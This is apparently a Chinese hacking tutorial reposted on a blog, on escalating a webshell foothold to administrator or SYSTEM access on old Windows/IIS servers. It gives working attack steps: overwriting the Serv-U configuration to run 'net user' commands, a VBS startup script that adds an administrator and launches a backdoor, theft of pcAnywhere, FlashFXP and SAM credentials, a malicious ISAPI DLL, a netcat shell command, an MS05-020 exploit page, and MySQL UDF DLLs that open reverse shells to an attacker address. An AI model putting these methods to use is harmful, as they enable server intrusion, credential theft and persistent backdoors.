webshell提权

touch_itpub

说到花了九牛二虎的力气获得了一个webshell， \n当然还想继续获得整个服务器的admin权限，正如不想得到admin的不是好黑客～ \n嘻嘻～～好跟我来，看看有什么可以利用的来提升权限 \n**************************************************************************** \n第一 \n如果服务器上有装了pcanywhere服务端，管理员为了管理方便 \n也给了我们方便，到系统盘的Documents and Settings/All Us \ners/Application Data/Symantec/pcAnywhere/中下载*.cif本地 \n破解就使用pcanywhere连接就ok了 \n**************************************************************************** \n第二 \n有很多小黑问我这么把webshell的iis user权限提升 \n一般服务器的管理都是本机设计完毕然后上传到空间里，\n那么就会用到ftp，服务器使用最多的就是servu \n那么我们就利用servu来提升权限 \n通过servu提升权限需要servu安装目录可写～ \n\n好开始把，首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载 \n下来，然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖， \n启动servu添加了一个用户，设置为系统管理员，目录C:，具有可执行权限 \n然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 \n\n用我新建的用户和密码连接～ \n好的，还是连上了 \nftp \nftp>open ip \nConnected to ip. \n220 Serv-U FTP Server v5.0.0.4 for WinSock ready... \nUser (ipnone)): id //刚才添加的用户 \n331 User name okay, please send complete E-mail address as password. \nPassword:password //密码 \n230 User logged in, proceed. \nftp> cd winnt //进入win2k的winnt目录 \n250 Directory changed to /WINNT \nftp>cd system32 //进入system32目录 \n250 Directory changed to /WINNT/system32 \nftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe \n文件加用户。 \n\n如果提示没有权限，那我们就 \n把后门（server.exe） 传他system32目录 \n然后写一个VBs教本 \nset wshshell=createobject (\"wscript.shell\" \na=wshshell.run (\"cmd.exe /c net user user pass /add\",0) \nb=wshshell.run (\"cmd.exe /c net localgroup Administrators user /add\",0) \nb=wshshell.run (\"cmd.exe /c server.exe\",0) \n\n存为xx.vbe \n这个教本的作用是建立user用户密码为pass \n并且提升为管理员 \n然后执行system32目录下的server.exe \n把这个教本传他 Cocuments and SettingsAll Users「开始」菜单程序启动 \n目录 \n这样管理员只要一登陆就会执行那个教本. \n接下来就是等了.等他登陆. \n**************************************************************************** \n第三 \n就是先检查有什么系统服务，或者随系统启动自动启动的程序和管理员经常使用的软件， 比如诺顿，VAdministrator，金山，瑞星,WinRAR甚至QQ之类的，是否可以写，如果可以就修改其程序， 绑定一个批处理或者VBS，然后还是等待服务器重启。 \n**************************************************************************** \n第四 \n查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码，可能会有所 \n收获等等。 \n**************************************************************************** \n第五 \n使用Flashfxp也能提升权限，但是成功率就看你自己的运气了 \n首先找到FlashFXP文件夹，打开(编辑)Sites. dat，这个文件这是什么东西密码和用户名， \n而且密码是加了密的。 如果我把这些文件copy回本地也就是我的计算机中，替换我本地的相应文件。然后会发现 打开flashfxp在站点中打开站点管理器一样。又可以添加N多肉鸡啦～～嘻嘻～ \n\n唔？？不对啊，是来提升权限的啊，晕，接着来别半途而废。 \n大家看看对方管理员的这站点管理器，有用户名和密码，密码是星号的。经过用xp星号密码 查看器查看，然后和Sites.dat中加密了密码做比较发现并未加密而是查到的密码是明文显示， 然后最终把这个网站管理员的密码从这堆东西中找 \n出来。那么下一步就可以链接这些新的服务器啦～～ \n经过测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地 \n还原对方管理员的各个站点的密码。 \n**************************************************************************** \n第六\n\nWIN2K+IIS5.0默认情况下应用程序保护选项是\"中（共用的）\"，这时IIS加载isapi是用的 \niwam_computername用户身份执行。 \n但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、 \nwin2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名，并且没有做目录限制， \n以SYSTEM权限加载的isapi有： \n1、 idq.dll \n2、 httpext.dll \n3、 httpodbc.dll \n4、 ssinc.dll \n5、 msw3prt.dll \n6、 author.dll \n7、 admin.dll \n8、 shtml.dll \n9、 sspifilt.dll \n10、compfilt.dll \n11、pwsdata.dll \n12、md5filt.dll \n13、fpexedll.dll \n\n所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug，比如请求/scripts/test%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的 远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题，就是\"/\"、\"\"只识别了一个 \"/\"，所以如果请求里面使用\"\"，就会错误的处理包含文件路径，有可能泄露东西或者出现权限 漏洞，这种漏洞很多别的地方（ php、asp等）也还存在。 \n\n加载这些isapi不是单以文件名做依据了，而是加了路径，应该是修正了此问题。 \n一般默认情况下是： \n1、 idq.dll d:winntsystem32idq.dll \n2、 httpext.dll d:winntsystem32inetsrvhttpext.dll \n3、 httpodbc.dll d:winntsystem32inetsrvhttpodbc.dll \n4、 ssinc.dll d:winntsystem32inrtsrvssinc.dll \n5、 msw3prt.dll d:winntsystem32msw3prt.dll \n6、 author.dll Drogram FilesCommon FilesMicrosoft Sharedweb server extensions40isapi\\_vti_autauthor.dll \n7、 admin.dll Drogram FilesCommon FilesMicrosoft Sharedweb server extensions40isapi\\_vti_admadmin.dll \n8、 shtml.dll Drogram FilesCommon FilesMicrosoft Sharedweb server extensions40isapishtml.dll \n9、 sspifilt.dll d:winntsystem32inetsrvsspifilt.dll \n10、compfilt.dll d:winntsystem32inetsrvcompfilt.dll \n11、pwsdata.dll d:winntsystem32inetsrvpwsdata.dll \n12、md5filt.dll d:winntsystem32inetsrvmd5filt.dll \n13、fpexedll.dll Drogram FilesCommon FilesMicrosoft Sharedweb server extensions40infpexedll.dll \n\n正常情况下这些路径都guest不能写,但如果配置不好，这些路径iis user能够写了就一样可以提升权限了 \n\n可以把ISAPIHack.dll上传到IIS的可执行目录，文件名可叫ssinc.dll或者admin.dll等（上面列的13个文件名之一）。 \n然后等待IIS重启加载此dll，就可以获得权限了 \n**************************************************************************** \n第七\n\n下载系统的 %windir%\repairsam.*（WinNT 4下是sam._ 而Windows 2000下是sam）文件， \n然后用L0pht等软件进行破解，只要能拿到，肯花时间，就一定可以破解。 \n**************************************************************************** \n第八\nPipeUpAdmin（Windows 2000下）, 在本机运行可以把当前用户帐号加入管理员组。普通用户和Guests组用户都可以成功运行。 \n**************************************************************************** \n第九 \nServ-u Ftp Server 本地权限提升漏洞： \n很多主机的Cocuments and SettingsAll Users Documents目录以及下边几个子目录Documents没有设置权限，导致可以在这个目录上传并运行Exp. 直接上传了serv-u local exploit 和nc, 并且把serv-u的本地提升权限的名字命名为su.exe 文件就放在Cocuments and SettingsAll Users Documents, 然后我们用su.exe直接建立用户,也可以反弹一个shell过来的。 \n具体命令： \n建立用户: serv-u.exe \"cmd\" \n>USER xl \n>ASS 111111 \n\n反弹shell: serv-u.exe \"nc.exe -l -p 99 -e cmd.exe\" \n\n很不错的提权新方法\n今天我要带给大家的是，当我们得到WEBSHELL后如何得到SYSTEM权限的新方法， 提升权限这个已经是老生常谈了，网络上已经有很多种提升权限的方法了，在这里我就不在提了，今天我给大家介绍的是就是主动利用MS05020漏洞来达到我们提升权限的目的。\nMS05020是一个IE漏洞，2005.4份的时候微软就发步了这个公告： \n安全漏洞CN-VA05-025\n发布日期：2005-04-13\n漏洞类型：远程执行代码\n漏洞评估：高危\n受影响版本：\nMicrosoft Windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4\nMicrosoft Windows XP Service Pack 1 和 Microsoft Windows XP Service Pack 2\nMicrosoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)\nMicrosoft Windows XP 64-Bit Edition Version 2003 (Itanium)\nMicrosoft Windows Server 2003\nMicrosoft Windows Server 2003(用于基于 Itanium 的系统)Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE) 和 Microsoft Windows Millennium Edition (ME) 测试过的 Microsoft Windows 组件：\n漏洞描述：\nInternet Explorer 由于其处理某些 DHTML 对象的方式而存在一个远程执行代码漏洞。 攻击者可以通过构建恶意的网页来利用该漏洞。 如果某个用户访问了恶意网站，此恶意网页就可能允许远程执行代码。 成功利用此漏洞的攻击者可以完全控制受影响的系统。Internet Explorer 由于其处理某些 URL 的方式而存在一个远程执行代码漏洞。 攻击者可以通过构建恶意的网页来利用该漏洞。 如果某个用户访问了恶意网站，此恶意网页就可能允许远程执行代码。 成功利用此漏洞的攻击者可以完全控制受影响的系统。Internet Explorer 由于其处理分级审查文件的方法而存在一个远程执行代码漏洞。 攻击者可以通过构造特制的分级审查文件来利用此漏洞。 如果用户访问了恶意网站或查看了恶意的电子邮件，并接受安装此恶意分级审查文件，则该文件可能允许远程执行代码。 成功利用此漏洞的攻击者可以完全控制受影响的系统。 不过，要利用此漏洞，需要进行大量用户交互。\n\n大家看到上面的漏洞描述了吗？当被人浏览的时候才会受到攻击，平时我们利用IE漏洞都是先把有攻击性的页面放到网上，然后等待别人去浏览，这样浏览者就会中招了。\n今天我们要提升权限，那自然是让我们要提升权限的主机去浏览存在漏洞的页面了，那当我们得到WEBSHELL后怎么才能让主机去浏览这个页面呢？\nMs05020的EXP网页代码已经出来了，大家可以到：\nhttp://www.eviloctal.com/forum/read.php?tid=10127\n去下载，假如我们已经把这个EXP放到http://www.xxxx.com/ms05020.html的地方，\n下面我们开始利用这个EXP，进入到我们的ASP木马，打开CMDSHELL，如果用不了的，大家自己想办法解决（可以自己上传一个CMD.EXE上去）。\n在命令行里输入：start http://www.xxxx.com/ms05020.html 然后点执行。\n\n这个时候主机的IE就会去访问我们的这个MS05020.HTML，那么如果主机没有打扑钉的话，就会绑定一个28876的断口在主机上。\n接着我们输入：netstat -an | find \"28876\" 看看是否成功绑定，第一次的话，会慢一些，大家要等待一下，我这里很快就成功了。然后我们telnet上去马上就成功了\n\n\n大家看到了：（我添加了一个temp的管理员）\n\n\n现在我们已经拿到SYSTEM权限了 ，大家还想干什么不可以？\n\n后记：其实大家还可以先上传NC，然后连接到本地后，再输入：\nstart http://www.xxx.com/ms05020.html也是可以的。\n还有就是如果可以的话还可以这样输入：\nstart \"Crogram FilesInternet Explorericxplore.exe\" http://www.xxx.com/ms05020.htm\n这个要看你的情况了，一般虚拟主机如果允许访问的话，那还是用第一个命令好了！\n我测试过在2K pro、 2K server(2000 Enterprise Terminal Server) 、2003都成功过！不过也有不成功的时候，而且不成功的概率很大，特别是到虚拟机的时候，有一次我没有成功，然后我开了3389进入，发现IE没有弹出来，而是出来了一个IE设置向导，也就是说这个服务器没有对IE进行网络设置IE是无法访问网络的，艾，其实我现在也没有搞清楚是怎么会事有点能成功有点不行，想也想不通，因为start ist:http://www.xxx.com/xxx.exe总是能成功！\n把XXX。EXE下载到它的电脑上面！我最后认为估计这个还是和MS05020.HTM这个文件有关。艾，看来这个方法的利用价值也很小了，本来不想发出来了的，既然写出来了，还是发表出来一下吧！刚刚和无敌讨论了一下，他也是说不成功的原因估计也是这个，还有就是系统打了IE补丁

touch_itpub

S-serv提权方式人人都会用了，搞得现在的主机都配置得非常安全，看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一，还有其他的pcanywhere获取密码，替换服务，等等。但是现在也没这么好搞了，随着安全意识的提高，之前的方式估计不怎么管用，现在我给大家介绍一下一种新的提权方式，看过古典LM做的那动画的朋友都知道吧？利用MYSQLl弱口令拿到系统权限，在WEBSHEL上也可实现，不过有个前提，就是目标主机装有MYSQL，而你又知道MYSQL的用户和密码，才可以进行提权。WEBSHELL获得了，找用户和密码也不是什么难事。现在我拿我另外一台机器做示范，已经把PHPSHELL传上去了,一般来说连接MYSQL的帐户密码很好找，随便编辑一个PHP文件，就看到了。\n看到了吧，用户名：root 密码：123456 库名：php  然后怎么办呢？先用SQL Query 建立连接，哈连接成功了，现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK，传好了，Mix.dll用于反弹连接，My_udf.dll是正向连接，直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好，不多说了，传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname /d:phpphpMix.dll/; 来注册函数.\n\n出现SQL语句成功执行！\n\n    离拿到CMDSHELL已经不远了，我们先用NC在本地监听一个端口先，Nc -l -p 1234 （这个我想不用截图了吧）而后执行语句：select Mixconnect(/192.168.1.254/,/1234/); 来激活那个函数，执行成功，然后看看我们的NC有反映没,成功得到CMSHELL，不过这时对方的MYSQL已经假死咯，我们要把MYSQL服务进程给kill掉，然后重新启动MYSQL服务才行，不然管理员发现网站运行不了了，那就。。。。如果该服务器不允许连接任何外部IP和端口，而他的3306端口却是对外开的！这时My_udf.dll就该上场了，使用方法和Mix一样，连接MYSQL成功后执行如下语句：create function my_udfdoor returns string soname /D:phpphpmy_udf.dll/; 执行语句成功后，然后我们就开始激活这个函数，输入语句：select my_udfdoor (//);  然后用nc连接3306端口,然后输入fuck 就可以得到一个cmdshell了.\n\nOK成功！测试结束咯